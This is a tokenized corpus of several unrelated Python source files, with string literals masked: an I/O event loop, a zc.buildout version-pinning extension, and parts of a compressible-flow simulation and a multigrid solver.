KQ_EV_ADD ) <EOL> def unregister ( self , fd ) : <EOL> self . _control ( fd , self . _fds [ fd ] , select . KQ_EV_DELETE ) <EOL> del self . _fds [ fd ] <EOL> def modify ( self , fd , mode ) : <EOL> self . unregister ( fd ) <EOL> self . register ( fd , mode ) <EOL> def close ( self ) : <EOL> self . _kqueue . close ( ) <EOL> class SelectLoop ( object ) : <EOL> def __init__ ( self ) : <EOL> self . _r_list = set ( ) <EOL> self . _w_list = set ( ) <EOL> self . _x_list = set ( ) <EOL> def poll ( self , timeout ) : <EOL> r , w , x = select . select ( self . _r_list , self . _w_list , self . _x_list , <EOL> timeout ) <EOL> results = defaultdict ( lambda : POLL_NULL ) <EOL> for p in [ ( r , POLL_IN ) , ( w , POLL_OUT ) , ( x , POLL_ERR ) ] : <EOL> for fd in p [ <NUM_LIT:0> ] : <EOL> results [ fd ] |= p [ <NUM_LIT:1> ] <EOL> return results . items ( ) <EOL> def register ( self , fd , mode ) : <EOL> if mode & POLL_IN : <EOL> self . _r_list . add ( fd ) <EOL> if mode & POLL_OUT : <EOL> self . _w_list . add ( fd ) <EOL> if mode & POLL_ERR : <EOL> self . _x_list . add ( fd ) <EOL> def unregister ( self , fd ) : <EOL> if fd in self . _r_list : <EOL> self . _r_list . remove ( fd ) <EOL> if fd in self . _w_list : <EOL> self . _w_list . remove ( fd ) <EOL> if fd in self . _x_list : <EOL> self . _x_list . remove ( fd ) <EOL> def modify ( self , fd , mode ) : <EOL> self . unregister ( fd ) <EOL> self . register ( fd , mode ) <EOL> def close ( self ) : <EOL> pass <EOL> class EventLoop ( object ) : <EOL> def __init__ ( self ) : <EOL> if hasattr ( select , '<STR_LIT>' ) : <EOL> self . _impl = select . epoll ( ) <EOL> model = '<STR_LIT>' <EOL> elif hasattr ( select , '<STR_LIT>' ) : <EOL> self . _impl = KqueueLoop ( ) <EOL> model = '<STR_LIT>' <EOL> elif hasattr ( select , '<STR_LIT>' ) : <EOL> self . _impl = SelectLoop ( ) <EOL> model = '<STR_LIT>' <EOL> else : <EOL> raise Exception ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _fdmap = { } <EOL> self . _last_time = time . 
time ( ) <EOL> self . _periodic_callbacks = [ ] <EOL> self . _stopping = False <EOL> logging . debug ( '<STR_LIT>' , model ) <EOL> def poll ( self , timeout = None ) : <EOL> events = self . _impl . poll ( timeout ) <EOL> return [ ( self . _fdmap [ fd ] [ <NUM_LIT:0> ] , fd , event ) for fd , event in events ] <EOL> def add ( self , f , mode , handler ) : <EOL> fd = f . fileno ( ) <EOL> self . _fdmap [ fd ] = ( f , handler ) <EOL> self . _impl . register ( fd , mode ) <EOL> def remove ( self , f ) : <EOL> fd = f . fileno ( ) <EOL> del self . _fdmap [ fd ] <EOL> self . _impl . unregister ( fd ) <EOL> def add_periodic ( self , callback ) : <EOL> self . _periodic_callbacks . append ( callback ) <EOL> def remove_periodic ( self , callback ) : <EOL> self . _periodic_callbacks . remove ( callback ) <EOL> def modify ( self , f , mode ) : <EOL> fd = f . fileno ( ) <EOL> self . _impl . modify ( fd , mode ) <EOL> def stop ( self ) : <EOL> self . _stopping = True <EOL> def run ( self ) : <EOL> events = [ ] <EOL> while not self . _stopping : <EOL> asap = False <EOL> try : <EOL> events = self . poll ( TIMEOUT_PRECISION ) <EOL> except ( OSError , IOError ) as e : <EOL> if errno_from_exception ( e ) in ( errno . EPIPE , errno . EINTR ) : <EOL> asap = True <EOL> logging . debug ( '<STR_LIT>' , e ) <EOL> else : <EOL> logging . error ( '<STR_LIT>' , e ) <EOL> import traceback <EOL> traceback . print_exc ( ) <EOL> continue <EOL> for sock , fd , event in events : <EOL> handler = self . _fdmap . get ( fd , None ) <EOL> if handler is not None : <EOL> handler = handler [ <NUM_LIT:1> ] <EOL> try : <EOL> handler . handle_event ( sock , fd , event ) <EOL> except ( OSError , IOError ) as e : <EOL> shell . print_exception ( e ) <EOL> now = time . time ( ) <EOL> if asap or now - self . _last_time >= TIMEOUT_PRECISION : <EOL> for callback in self . _periodic_callbacks : <EOL> callback ( ) <EOL> self . _last_time = now <EOL> def __del__ ( self ) : <EOL> self . _impl . 
close ( ) <EOL> def errno_from_exception ( e ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( e , '<STR_LIT>' ) : <EOL> return e . errno <EOL> elif e . args : <EOL> return e . args [ <NUM_LIT:0> ] <EOL> else : <EOL> return None <EOL> def get_sock_error ( sock ) : <EOL> error_number = sock . getsockopt ( socket . SOL_SOCKET , socket . SO_ERROR ) <EOL> return socket . error ( error_number , os . strerror ( error_number ) ) </s>
<s> """<STR_LIT>""" <EOL> from flask_restplus . inputs import * <EOL> from . my_inputs import boolean </s>
<s> import os <EOL> import logging <EOL> import pkgutil <EOL> import pkg_resources <EOL> import ConfigParser <EOL> import re <EOL> import zc . buildout <EOL> import config_enhance <EOL> import subprocess <EOL> import sys <EOL> __ALL__ = [ "<STR_LIT>" , "<STR_LIT:start>" , "<STR_LIT>" ] <EOL> EGG_URI_RE = re . compile ( "<STR_LIT>" ) <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class PlatformVersions ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , buildout ) : <EOL> '''<STR_LIT>''' <EOL> self . buildout = buildout <EOL> self . config_section = None <EOL> self . source_section = None <EOL> self . sources = None <EOL> self . target_section = None <EOL> self . platform_env_var = None <EOL> def parse_config ( self ) : <EOL> self . load_config_section_name ( ) <EOL> self . load_platform_env_var ( ) <EOL> self . load_source_section ( ) <EOL> self . load_source_list ( ) <EOL> self . load_target_section ( ) <EOL> def load_platform_env_var ( self ) : <EOL> if self . _config : <EOL> platform_env_var = self . _config . get ( "<STR_LIT>" , None ) <EOL> if platform_env_var : <EOL> platform_env_var = platform_env_var . strip ( ) <EOL> if len ( platform_env_var ) == <NUM_LIT:0> : <EOL> platform_env_var = None <EOL> self . platform_env_var = platform_env_var <EOL> def load_config_section_name ( self ) : <EOL> self . config_section = self . buildout [ '<STR_LIT>' ] . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> self . _config = self . buildout [ self . config_section ] <EOL> except : <EOL> self . _config = None <EOL> def load_source_section ( self ) : <EOL> self . source_section = self . _get_platform ( ) <EOL> def load_source_list ( self ) : <EOL> source_list = [ ] <EOL> if self . _config : <EOL> source_str = self . _config . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> for name in source_str . split ( "<STR_LIT:\n>" ) : <EOL> name = name . strip ( ) <EOL> if len ( name ) : <EOL> source_list . append ( name ) <EOL> for source in source_list : <EOL> LOG . 
info ( "<STR_LIT>" , source ) <EOL> self . sources = source_list <EOL> else : <EOL> self . sources = [ ] <EOL> return source_list <EOL> def load_target_section ( self ) : <EOL> if '<STR_LIT>' in self . buildout [ '<STR_LIT>' ] : <EOL> self . target_section = self . buildout [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> else : <EOL> self . target_section = '<STR_LIT>' <EOL> def _get_platform_from_env ( self ) : <EOL> platform_env = None <EOL> if self . platform_env_var : <EOL> platform_env = os . getenv ( self . platform_env_var , None ) <EOL> if platform_env is not None and len ( platform_env ) > <NUM_LIT:0> : <EOL> LOG . debug ( "<STR_LIT>" , self . platform_env_var , platform_env ) <EOL> else : <EOL> LOG . debug ( "<STR_LIT>" , self . platform_env_var ) <EOL> return platform_env <EOL> def _get_platform_from_config ( self ) : <EOL> if self . _config : <EOL> platform_env = self . _config . get ( "<STR_LIT>" , None ) <EOL> if platform_env : <EOL> platform_env = platform_env . strip ( ) <EOL> if len ( platform_env ) == <NUM_LIT:0> : <EOL> platform_env = None <EOL> if platform_env is None : <EOL> LOG . error ( "<STR_LIT:%s>" , "<STR_LIT>" ) <EOL> raise Exception ( "<STR_LIT>" ) <EOL> else : <EOL> LOG . info ( "<STR_LIT>" , self . config_section , "<STR_LIT>" , platform_env ) <EOL> else : <EOL> platform_env = None <EOL> return platform_env <EOL> def _get_platform ( self ) : <EOL> '''<STR_LIT>''' <EOL> platform_env = self . _get_platform_from_env ( ) <EOL> if not platform_env : <EOL> platform_env = self . _get_platform_from_config ( ) <EOL> return platform_env <EOL> def load_platform_versions ( self ) : <EOL> new_versions = { } <EOL> cp = ConfigParser . ConfigParser ( ) <EOL> for file_name in self . sources : <EOL> _load_config ( cp , file_name ) <EOL> config_enhance . enhance ( cp ) <EOL> if cp . has_section ( self . source_section ) : <EOL> new_versions . update ( cp . items ( self . source_section ) ) <EOL> else : <EOL> LOG . warn ( "<STR_LIT>" , self . 
source_section ) <EOL> LOG . warn ( "<STR_LIT>" ) <EOL> for section in cp . sections ( ) : <EOL> LOG . info ( "<STR_LIT>" , section ) <EOL> return new_versions <EOL> def load_develop_packages ( self ) : <EOL> pkgs = [ ] <EOL> if self . buildout is not None : <EOL> buildout_section = self . buildout . get ( "<STR_LIT>" , None ) <EOL> if buildout_section is not None : <EOL> develop_str = buildout_section . get ( "<STR_LIT>" , None ) <EOL> if develop_str is not None : <EOL> develop_paths = [ vv for vv in develop_str . split ( ) if len ( vv ) ] <EOL> if len ( develop_paths ) : <EOL> develop_pkgs = lookup_develop_distributions ( develop_paths ) <EOL> pkg_names = [ dd for dd in develop_pkgs ] <EOL> pkgs . extend ( pkg_names ) <EOL> if self . _config is not None : <EOL> package_string = self . _config . get ( "<STR_LIT>" , None ) <EOL> if package_string is not None : <EOL> pkgs . extend ( [ ( vv . strip ( ) , None ) for vv in package_string . split ( ) ] ) <EOL> return pkgs <EOL> def load_composite_versions ( self ) : <EOL> cur_versions = dict ( self . buildout [ self . target_section ] ) <EOL> new_versions = self . load_platform_versions ( ) <EOL> new_versions . update ( cur_versions ) <EOL> for pkg in self . load_develop_packages ( ) : <EOL> if pkg [ <NUM_LIT:1> ] is None : <EOL> LOG . info ( "<STR_LIT>" , pkg ) <EOL> new_versions . pop ( pkg [ <NUM_LIT:0> ] , None ) <EOL> else : <EOL> LOG . info ( "<STR_LIT>" , pkg [ <NUM_LIT:0> ] , pkg [ <NUM_LIT:1> ] ) <EOL> new_versions [ pkg [ <NUM_LIT:0> ] ] = pkg [ <NUM_LIT:1> ] <EOL> self . versions = new_versions <EOL> return self . versions <EOL> def apply_new_versions ( self ) : <EOL> '''<STR_LIT>''' <EOL> target = self . buildout [ self . target_section ] <EOL> target . clear ( ) <EOL> target . update ( self . versions ) <EOL> zc . buildout . easy_install . default_versions ( self . versions ) <EOL> for k , v in self . versions . iteritems ( ) : <EOL> LOG . 
debug ( "<STR_LIT>" , k , v ) <EOL> def apply_to_buildout ( self ) : <EOL> self . parse_config ( ) <EOL> self . load_composite_versions ( ) <EOL> self . apply_new_versions ( ) <EOL> def read_package_name_from_setup_py ( path ) : <EOL> try : <EOL> setup_py = os . path . join ( path , "<STR_LIT>" ) <EOL> if os . path . exists ( setup_py ) : <EOL> cmd = [ sys . executable , "<STR_LIT>" , "<STR_LIT>" , setup_py , "<STR_LIT>" , "<STR_LIT>" ] <EOL> env = { "<STR_LIT>" : "<STR_LIT::>" . join ( sys . path ) } <EOL> proc = subprocess . Popen ( cmd , env = env , stdout = subprocess . PIPE ) <EOL> result = proc . communicate ( ) <EOL> vv = result [ <NUM_LIT:0> ] <EOL> if proc . returncode != <NUM_LIT:0> : <EOL> raise Exception ( "<STR_LIT>" % ( "<STR_LIT:U+0020>" . join ( cmd ) , proc . returncode ) ) <EOL> return parse_setup_py_version_output ( vv ) <EOL> except ( Exception , IOError ) : <EOL> LOG . exception ( "<STR_LIT>" , setup_py ) <EOL> def parse_setup_py_version_output ( output ) : <EOL> """<STR_LIT>""" <EOL> return tuple ( output . split ( ) [ - <NUM_LIT:2> : ] ) <EOL> def read_package_name_from_pkg_resources ( path ) : <EOL> try : <EOL> vv = pkg_resources . find_distributions ( path ) <EOL> if vv is not None : <EOL> return vv . split ( ) <EOL> except ( Exception , IOError ) : <EOL> LOG . exception ( "<STR_LIT>" % path ) <EOL> def lookup_develop_distributions ( paths ) : <EOL> dists = [ ] <EOL> for path in paths : <EOL> pkg = read_package_name_from_setup_py ( path ) <EOL> if pkg is None : <EOL> pkg = read_package_name_from_pkg_resources ( path ) <EOL> if pkg is None : <EOL> LOG . error ( "<STR_LIT>" , path ) <EOL> else : <EOL> dists . append ( pkg ) <EOL> return dists <EOL> def _load_resource ( uri ) : <EOL> mm = EGG_URI_RE . match ( uri ) <EOL> if mm : <EOL> dd = mm . groupdict ( ) <EOL> egg_name = dd [ "<STR_LIT>" ] <EOL> path = dd [ "<STR_LIT:path>" ] <EOL> data = pkgutil . 
get_data ( egg_name , path ) <EOL> return data <EOL> elif "<STR_LIT>" in uri : <EOL> import urllib2 <EOL> return urllib2 . urlopen ( uri ) . read ( ) <EOL> else : <EOL> return file ( uri ) . read ( ) <EOL> def _load_config ( cc , uri ) : <EOL> content = _load_resource ( uri ) <EOL> import StringIO <EOL> buf = StringIO . StringIO ( content ) <EOL> cc . readfp ( buf , uri ) <EOL> def start ( buildout ) : <EOL> platform = PlatformVersions ( buildout ) <EOL> platform . apply_to_buildout ( ) <EOL> def finish ( buildout ) : <EOL> pass </s>
<s> from __future__ import print_function <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> import compressible . BC as BC <EOL> from compressible . problems import * <EOL> import compressible . eos as eos <EOL> import mesh . patch as patch <EOL> from simulation_null import NullSimulation , grid_setup , bc_setup <EOL> from compressible . unsplitFluxes import * <EOL> from util import profile <EOL> class Variables ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , idens = - <NUM_LIT:1> , ixmom = - <NUM_LIT:1> , iymom = - <NUM_LIT:1> , iener = - <NUM_LIT:1> ) : <EOL> self . nvar = <NUM_LIT:4> <EOL> self . idens = idens <EOL> self . ixmom = ixmom <EOL> self . iymom = iymom <EOL> self . iener = iener <EOL> self . irho = <NUM_LIT:0> <EOL> self . iu = <NUM_LIT:1> <EOL> self . iv = <NUM_LIT:2> <EOL> self . ip = <NUM_LIT:3> <EOL> class BCProp ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , xl_prop , xr_prop , yl_prop , yr_prop ) : <EOL> self . xl = xl_prop <EOL> self . xr = xr_prop <EOL> self . yl = yl_prop <EOL> self . yr = yr_prop <EOL> class Simulation ( NullSimulation ) : <EOL> def initialize ( self ) : <EOL> """<STR_LIT>""" <EOL> my_grid = grid_setup ( self . rp , ng = <NUM_LIT:4> ) <EOL> my_data = patch . CellCenterData2d ( my_grid ) <EOL> patch . define_bc ( "<STR_LIT>" , BC . user , is_solid = False ) <EOL> bc , bc_xodd , bc_yodd = bc_setup ( self . rp ) <EOL> self . solid = BCProp ( int ( patch . bc_props [ self . rp . get_param ( "<STR_LIT>" ) ] ) , <EOL> int ( patch . bc_props [ self . rp . get_param ( "<STR_LIT>" ) ] ) , <EOL> int ( patch . bc_props [ self . rp . get_param ( "<STR_LIT>" ) ] ) , <EOL> int ( patch . bc_props [ self . rp . get_param ( "<STR_LIT>" ) ] ) ) <EOL> my_data . register_var ( "<STR_LIT>" , bc ) <EOL> my_data . register_var ( "<STR_LIT>" , bc ) <EOL> my_data . register_var ( "<STR_LIT>" , bc_xodd ) <EOL> my_data . register_var ( "<STR_LIT>" , bc_yodd ) <EOL> my_data . 
set_aux ( "<STR_LIT>" , self . rp . get_param ( "<STR_LIT>" ) ) <EOL> my_data . set_aux ( "<STR_LIT>" , self . rp . get_param ( "<STR_LIT>" ) ) <EOL> my_data . create ( ) <EOL> self . cc_data = my_data <EOL> aux_data = patch . CellCenterData2d ( my_grid ) <EOL> aux_data . register_var ( "<STR_LIT>" , bc_yodd ) <EOL> aux_data . register_var ( "<STR_LIT>" , bc ) <EOL> aux_data . create ( ) <EOL> self . aux_data = aux_data <EOL> self . vars = Variables ( idens = my_data . vars . index ( "<STR_LIT>" ) , <EOL> ixmom = my_data . vars . index ( "<STR_LIT>" ) , <EOL> iymom = my_data . vars . index ( "<STR_LIT>" ) , <EOL> iener = my_data . vars . index ( "<STR_LIT>" ) ) <EOL> exec ( self . problem_name + '<STR_LIT>' ) <EOL> if self . verbose > <NUM_LIT:0> : print ( my_data ) <EOL> def compute_timestep ( self ) : <EOL> """<STR_LIT>""" <EOL> cfl = self . rp . get_param ( "<STR_LIT>" ) <EOL> dens = self . cc_data . get_var ( "<STR_LIT>" ) <EOL> xmom = self . cc_data . get_var ( "<STR_LIT>" ) <EOL> ymom = self . cc_data . get_var ( "<STR_LIT>" ) <EOL> ener = self . cc_data . get_var ( "<STR_LIT>" ) <EOL> u = xmom / dens <EOL> v = ymom / dens <EOL> e = ( ener - <NUM_LIT:0.5> * dens * ( u * u + v * v ) ) / dens <EOL> gamma = self . rp . get_param ( "<STR_LIT>" ) <EOL> p = eos . pres ( gamma , dens , e ) <EOL> cs = np . sqrt ( gamma * p / dens ) <EOL> xtmp = self . cc_data . grid . dx / ( abs ( u ) + cs ) <EOL> ytmp = self . cc_data . grid . dy / ( abs ( v ) + cs ) <EOL> self . dt = cfl * min ( xtmp . min ( ) , ytmp . min ( ) ) <EOL> def evolve ( self ) : <EOL> """<STR_LIT>""" <EOL> tm_evolve = self . tc . timer ( "<STR_LIT>" ) <EOL> tm_evolve . begin ( ) <EOL> dens = self . cc_data . get_var ( "<STR_LIT>" ) <EOL> ymom = self . cc_data . get_var ( "<STR_LIT>" ) <EOL> ener = self . cc_data . get_var ( "<STR_LIT>" ) <EOL> grav = self . rp . get_param ( "<STR_LIT>" ) <EOL> myg = self . cc_data . grid <EOL> Flux_x , Flux_y = unsplitFluxes ( self . cc_data , self . aux_data , self . 
rp , <EOL> self . vars , self . solid , self . tc , self . dt ) <EOL> old_dens = dens . copy ( ) <EOL> old_ymom = ymom . copy ( ) <EOL> dtdx = self . dt / myg . dx <EOL> dtdy = self . dt / myg . dy <EOL> for n in range ( self . vars . nvar ) : <EOL> var = self . cc_data . get_var_by_index ( n ) <EOL> var . v ( ) [ : , : ] += dtdx * ( Flux_x . v ( n = n ) - Flux_x . ip ( <NUM_LIT:1> , n = n ) ) + dtdy * ( Flux_y . v ( n = n ) - Flux_y . jp ( <NUM_LIT:1> , n = n ) ) <EOL> ymom . d [ : , : ] += <NUM_LIT:0.5> * self . dt * ( dens . d [ : , : ] + old_dens . d [ : , : ] ) * grav <EOL> ener . d [ : , : ] += <NUM_LIT:0.5> * self . dt * ( ymom . d [ : , : ] + old_ymom . d [ : , : ] ) * grav <EOL> self . cc_data . t += self . dt <EOL> self . n += <NUM_LIT:1> <EOL> tm_evolve . end ( ) <EOL> def dovis ( self ) : <EOL> """<STR_LIT>""" <EOL> plt . clf ( ) <EOL> plt . rc ( "<STR_LIT>" , size = <NUM_LIT:10> ) <EOL> dens = self . cc_data . get_var ( "<STR_LIT>" ) <EOL> xmom = self . cc_data . get_var ( "<STR_LIT>" ) <EOL> ymom = self . cc_data . get_var ( "<STR_LIT>" ) <EOL> ener = self . cc_data . get_var ( "<STR_LIT>" ) <EOL> u = xmom / dens <EOL> v = ymom / dens <EOL> magvel = u ** <NUM_LIT:2> + v ** <NUM_LIT:2> <EOL> rhoe = ( ener - <NUM_LIT:0.5> * dens * magvel ) <EOL> magvel = np . sqrt ( magvel ) <EOL> e = rhoe / dens <EOL> gamma = self . cc_data . get_aux ( "<STR_LIT>" ) <EOL> p = eos . pres ( gamma , dens , e ) <EOL> myg = self . cc_data . grid <EOL> L_x = self . cc_data . grid . xmax - self . cc_data . grid . xmin <EOL> L_y = self . cc_data . grid . ymax - self . cc_data . grid . ymin <EOL> orientation = "<STR_LIT>" <EOL> shrink = <NUM_LIT:1.0> <EOL> sparseX = <NUM_LIT:0> <EOL> allYlabel = <NUM_LIT:1> <EOL> if L_x > <NUM_LIT:2> * L_y : <EOL> fig , axes = plt . subplots ( nrows = <NUM_LIT:4> , ncols = <NUM_LIT:1> , num = <NUM_LIT:1> ) <EOL> orientation = "<STR_LIT>" <EOL> if ( L_x > <NUM_LIT:4> * L_y ) : <EOL> shrink = <NUM_LIT> <EOL> onLeft = list ( range ( self . vars . 
nvar ) ) <EOL> elif L_y > <NUM_LIT:2> * L_x : <EOL> fig , axes = plt . subplots ( nrows = <NUM_LIT:1> , ncols = <NUM_LIT:4> , num = <NUM_LIT:1> ) <EOL> if ( L_y >= <NUM_LIT:3> * L_x ) : <EOL> shrink = <NUM_LIT:0.5> <EOL> sparseX = <NUM_LIT:1> <EOL> allYlabel = <NUM_LIT:0> <EOL> onLeft = [ <NUM_LIT:0> ] <EOL> else : <EOL> fig , axes = plt . subplots ( nrows = <NUM_LIT:2> , ncols = <NUM_LIT:2> , num = <NUM_LIT:1> ) <EOL> plt . subplots_adjust ( hspace = <NUM_LIT> ) <EOL> onLeft = [ <NUM_LIT:0> , <NUM_LIT:2> ] <EOL> fields = [ dens , magvel , p , e ] <EOL> field_names = [ r"<STR_LIT>" , r"<STR_LIT>" , "<STR_LIT:p>" , "<STR_LIT:e>" ] <EOL> for n in range ( <NUM_LIT:4> ) : <EOL> ax = axes . flat [ n ] <EOL> v = fields [ n ] <EOL> img = ax . imshow ( np . transpose ( v . v ( ) ) , <EOL> interpolation = "<STR_LIT>" , origin = "<STR_LIT>" , <EOL> extent = [ myg . xmin , myg . xmax , myg . ymin , myg . ymax ] ) <EOL> ax . set_xlabel ( "<STR_LIT:x>" ) <EOL> if n == <NUM_LIT:0> : <EOL> ax . set_ylabel ( "<STR_LIT:y>" ) <EOL> elif allYlabel : <EOL> ax . set_ylabel ( "<STR_LIT:y>" ) <EOL> ax . set_title ( field_names [ n ] ) <EOL> if not n in onLeft : <EOL> ax . yaxis . offsetText . set_visible ( False ) <EOL> if n > <NUM_LIT:0> : ax . get_yaxis ( ) . set_visible ( False ) <EOL> if sparseX : <EOL> ax . xaxis . set_major_locator ( plt . MaxNLocator ( <NUM_LIT:3> ) ) <EOL> plt . colorbar ( img , ax = ax , orientation = orientation , shrink = shrink ) <EOL> plt . figtext ( <NUM_LIT> , <NUM_LIT> , "<STR_LIT>" % self . cc_data . t ) <EOL> plt . draw ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> import multigrid . edge_coeffs as ec <EOL> import multigrid . MG as MG <EOL> np . set_printoptions ( precision = <NUM_LIT:3> , linewidth = <NUM_LIT> ) <EOL> class GeneralMG2d ( MG . CellCenterMG2d ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , nx , ny , xmin = <NUM_LIT:0.0> , xmax = <NUM_LIT:1.0> , ymin = <NUM_LIT:0.0> , ymax = <NUM_LIT:1.0> , <EOL> xl_BC_type = "<STR_LIT>" , xr_BC_type = "<STR_LIT>" , <EOL> yl_BC_type = "<STR_LIT>" , yr_BC_type = "<STR_LIT>" , <EOL> xl_BC = None , xr_BC = None , <EOL> yl_BC = None , yr_BC = None , <EOL> nsmooth = <NUM_LIT:10> , nsmooth_bottom = <NUM_LIT:50> , <EOL> verbose = <NUM_LIT:0> , <EOL> coeffs = None , <EOL> true_function = None , vis = <NUM_LIT:0> , vis_title = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> self . beta_edge = [ ] <EOL> MG . CellCenterMG2d . __init__ ( self , nx , ny , ng = <NUM_LIT:1> , <EOL> xmin = xmin , xmax = xmax , ymin = ymin , ymax = ymax , <EOL> xl_BC_type = xl_BC_type , xr_BC_type = xr_BC_type , <EOL> yl_BC_type = yl_BC_type , yr_BC_type = yr_BC_type , <EOL> xl_BC = xl_BC , xr_BC = xr_BC , <EOL> yl_BC = yl_BC , yr_BC = yr_BC , <EOL> alpha = <NUM_LIT:0.0> , beta = <NUM_LIT:0.0> , <EOL> nsmooth = nsmooth , nsmooth_bottom = nsmooth_bottom , <EOL> verbose = verbose , <EOL> aux_field = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> aux_bc = [ coeffs . BCs [ "<STR_LIT>" ] , coeffs . BCs [ "<STR_LIT>" ] , <EOL> coeffs . BCs [ "<STR_LIT>" ] , coeffs . BCs [ "<STR_LIT>" ] ] , <EOL> true_function = true_function , vis = vis , <EOL> vis_title = vis_title ) <EOL> for c in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> v = self . grids [ self . nlevels - <NUM_LIT:1> ] . get_var ( c ) <EOL> v . v ( ) [ : , : ] = coeffs . get_var ( c ) . v ( ) <EOL> self . grids [ self . nlevels - <NUM_LIT:1> ] . fill_BC ( c ) <EOL> n = self . 
nlevels - <NUM_LIT:2> <EOL> while n >= <NUM_LIT:0> : <EOL> f_patch = self . grids [ n + <NUM_LIT:1> ] <EOL> c_patch = self . grids [ n ] <EOL> coeffs_c = c_patch . get_var ( c ) <EOL> coeffs_c . v ( ) [ : , : ] = f_patch . restrict ( c ) . v ( ) <EOL> self . grids [ n ] . fill_BC ( c ) <EOL> n -= <NUM_LIT:1> <EOL> beta = self . grids [ self . nlevels - <NUM_LIT:1> ] . get_var ( "<STR_LIT>" ) <EOL> self . beta_edge . insert ( <NUM_LIT:0> , ec . EdgeCoeffs ( self . grids [ self . nlevels - <NUM_LIT:1> ] . grid , beta ) ) <EOL> n = self . nlevels - <NUM_LIT:2> <EOL> while n >= <NUM_LIT:0> : <EOL> self . beta_edge . insert ( <NUM_LIT:0> , self . beta_edge [ <NUM_LIT:0> ] . restrict ( ) ) <EOL> n -= <NUM_LIT:1> <EOL> def smooth ( self , level , nsmooth ) : <EOL> """<STR_LIT>""" <EOL> v = self . grids [ level ] . get_var ( "<STR_LIT:v>" ) <EOL> f = self . grids [ level ] . get_var ( "<STR_LIT:f>" ) <EOL> myg = self . grids [ level ] . grid <EOL> dx = myg . dx <EOL> dy = myg . dy <EOL> self . grids [ level ] . fill_BC ( "<STR_LIT:v>" ) <EOL> alpha = self . grids [ level ] . get_var ( "<STR_LIT>" ) <EOL> gamma_x = <NUM_LIT:0.5> * self . grids [ level ] . get_var ( "<STR_LIT>" ) / dx <EOL> gamma_y = <NUM_LIT:0.5> * self . grids [ level ] . get_var ( "<STR_LIT>" ) / dy <EOL> beta_x = self . beta_edge [ level ] . x <EOL> beta_y = self . beta_edge [ level ] . y <EOL> for i in range ( nsmooth ) : <EOL> for n , ( ix , iy ) in enumerate ( [ ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) ] ) : <EOL> denom = ( <EOL> alpha . ip_jp ( ix , iy , s = <NUM_LIT:2> ) - <EOL> beta_x . ip_jp ( <NUM_LIT:1> + ix , iy , s = <NUM_LIT:2> ) - beta_x . ip_jp ( ix , iy , s = <NUM_LIT:2> ) - <EOL> beta_y . ip_jp ( ix , <NUM_LIT:1> + iy , s = <NUM_LIT:2> ) - beta_y . ip_jp ( ix , iy , s = <NUM_LIT:2> ) ) <EOL> v . ip_jp ( ix , iy , s = <NUM_LIT:2> ) [ : , : ] = ( f . ip_jp ( ix , iy , s = <NUM_LIT:2> ) - <EOL> ( beta_x . 
ip_jp ( <NUM_LIT:1> + ix , iy , s = <NUM_LIT:2> ) + gamma_x . ip_jp ( ix , iy , s = <NUM_LIT:2> ) ) * <EOL> v . ip_jp ( <NUM_LIT:1> + ix , iy , s = <NUM_LIT:2> ) - <EOL> ( beta_x . ip_jp ( ix , iy , s = <NUM_LIT:2> ) - gamma_x . ip_jp ( ix , iy , s = <NUM_LIT:2> ) ) * <EOL> v . ip_jp ( - <NUM_LIT:1> + ix , iy , s = <NUM_LIT:2> ) - <EOL> ( beta_y . ip_jp ( ix , <NUM_LIT:1> + iy , s = <NUM_LIT:2> ) + gamma_y . ip_jp ( ix , iy , s = <NUM_LIT:2> ) ) * <EOL> v . ip_jp ( ix , <NUM_LIT:1> + iy , s = <NUM_LIT:2> ) - <EOL> ( beta_y . ip_jp ( ix , iy , s = <NUM_LIT:2> ) - gamma_y . ip_jp ( ix , iy , s = <NUM_LIT:2> ) ) * <EOL> v . ip_jp ( ix , - <NUM_LIT:1> + iy , s = <NUM_LIT:2> ) ) / denom <EOL> if n == <NUM_LIT:1> or n == <NUM_LIT:3> : <EOL> self . grids [ level ] . fill_BC ( "<STR_LIT:v>" ) <EOL> if self . vis == <NUM_LIT:1> : <EOL> plt . clf ( ) <EOL> plt . subplot ( <NUM_LIT> ) <EOL> self . _draw_solution ( ) <EOL> plt . subplot ( <NUM_LIT> ) <EOL> self . _draw_V ( ) <EOL> plt . subplot ( <NUM_LIT> ) <EOL> self . _draw_main_solution ( ) <EOL> plt . subplot ( <NUM_LIT> ) <EOL> self . _draw_main_error ( ) <EOL> plt . suptitle ( self . vis_title , fontsize = <NUM_LIT> ) <EOL> plt . draw ( ) <EOL> plt . savefig ( "<STR_LIT>" % ( self . frame ) ) <EOL> self . frame += <NUM_LIT:1> <EOL> def _compute_residual ( self , level ) : <EOL> """<STR_LIT>""" <EOL> v = self . grids [ level ] . get_var ( "<STR_LIT:v>" ) <EOL> f = self . grids [ level ] . get_var ( "<STR_LIT:f>" ) <EOL> r = self . grids [ level ] . get_var ( "<STR_LIT:r>" ) <EOL> myg = self . grids [ level ] . grid <EOL> dx = myg . dx <EOL> dy = myg . dy <EOL> alpha = self . grids [ level ] . get_var ( "<STR_LIT>" ) <EOL> gamma_x = <NUM_LIT:0.5> * self . grids [ level ] . get_var ( "<STR_LIT>" ) / dx <EOL> gamma_y = <NUM_LIT:0.5> * self . grids [ level ] . get_var ( "<STR_LIT>" ) / dy <EOL> beta_x = self . beta_edge [ level ] . x <EOL> beta_y = self . beta_edge [ level ] . y <EOL> 